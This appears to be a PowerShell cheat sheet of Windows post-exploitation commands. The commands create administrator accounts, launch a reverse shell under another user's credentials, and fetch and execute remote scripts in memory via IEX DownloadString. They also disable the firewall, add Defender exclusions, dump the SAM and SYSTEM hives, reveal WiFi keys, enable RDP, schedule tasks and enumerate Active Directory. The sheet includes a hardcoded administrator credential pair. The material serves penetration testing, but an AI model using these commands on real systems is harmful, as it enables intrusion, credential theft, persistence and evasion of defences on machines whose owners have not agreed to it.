Powershell
Table of content
- Create and admin user
- Run as domain user
- Copy a full directory
- Check hives rights
- Display wifi passwords
- Download file
- Run as another user
- Use system proxy
- IEX downloadstring
- Set environment variable
- Add exclusion folder to WinDefender
- Disable firewall
- Dump SAM
- Activate RDP
- List RDP connection on a machine
- Kill process by name
- Scheduled task
- Domain Information
- Proxy Aware
Create and admin user
Create the user and add it to the Administrator group
net user username password /add
net localgroup Administrators nom_user /add
Run as domain user
Run a powershell as a domain user
runas /netonly /user:DOMAIN@USER 'powershell.exe –Exec Bypass'
/netonly: network connection will be performed using the domain user profile
Copy a full directory
Copy a full directory and its subdirectory
xcopy.exe /s source_absolute_path dest_absolute_path
Check hives rights
Use Sysinternals binary accesschk.exe to check the hive ACL
accesschk.exe /accepteula -qusk "Users" HKLM\SOFTWARE\....
Display wifi passwords
Display a wifi password knowing its SSID
netsh wlan show profiles
netsh wlan show profile name="NETWORK" key=clear | Select-String 'Key Content'
Download file
Invoke-WebRequest -Uri ${url} -OutFile ${outFile}
Run as another user
Run executable as an other user. Usefull to launch reverse shell with another user privilege.
$secpasswd = ConvertTo-SecureString ${password} -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (${username}, $secpasswd)
$computer = "${hostname}"
[System.Diagnostics.Process]::Start(${reverseShellPath},"", $mycreds.Username, $mycreds.Password, $computer)
$username = "BART\Administrator"
$password = "3130438f31186fbaf962f407711faddb"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
Invoke-Command -ScriptBlock { XXXXXX } -Credential $cred -Computer localhost
Use system proxy
Use the configured system proxy to perform requests
(New-Object System.Net.WebClient).Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX downloadstring
Download remote powershell script and execute it from memory
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('${URI}/file.ps1')
Set environment variable
Set the value of an environment variable.
Set-Content -Path Env:${EnvVar} -Value ${NewValue}
Add exclusion folder to WinDefender
Add a no-scan directory to WinDefender
Set-MpPreference -ExclusionPath "C:\Temp"
Disable firewall
Fully disable the firewall
netsh advfirewall set allprofiles state off
Dump SAM
Save the SAM and the System hive
reg save HKLM\SAM ./SAM.save
reg save HKLM\System ./System.save
Activate RDP
Enable and authorize RDP connections
# Allow RDP connexions
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0
# Enable network pre-authentication (allows creds c/c)
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 1
# Allow RDP flux through the firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
List RDP connection on a machine
List the users having an RDP connection on the targeted machine
$DSC = (New-Object System.Management.Automation.PSCredential("${domain}\${user}", (ConvertTo-SecureString "${password}" -AsPlainText -Force)))
invoke-command {qwinsta} -ComputerName ${ip} -Credential $DSC
Kill process by name
Kill all process with a specific name
taskkill /IM ${processName} /F
Scheduled task
# Define the task
# Change the /sc and /mo to reach you time need
schtasks /create /sc hourly /mo 1 /tn "${taskname}" /tr "${command}"
# Force the task execution
schtasks /run /tn "${taskname}"
Domain Information
Get password policy
Get-DomainPolicyData | select -ExpandProperty SystemAccess
Get dommain user information
Get-DomainUser -Identity nlamb
Get computer information
Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName
# Enumerate machine where a specific domain user or group is member of a specific group
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
Get Organization Unit
Get-DomainOU -Properties Name | sort -Property Name
Get group information
Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName
Get GPO
Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -ComputerIdentity ${ComputerName} -Properties DisplayName | sort -Property
# GPO modifying local group membership
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName
Get Session information
Get information of the session open on the local (or remote) machine. CName is the source of the connection.
Get-NetSession -ComputerName ${computerName} | select CName, UserName
Proxy Aware
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")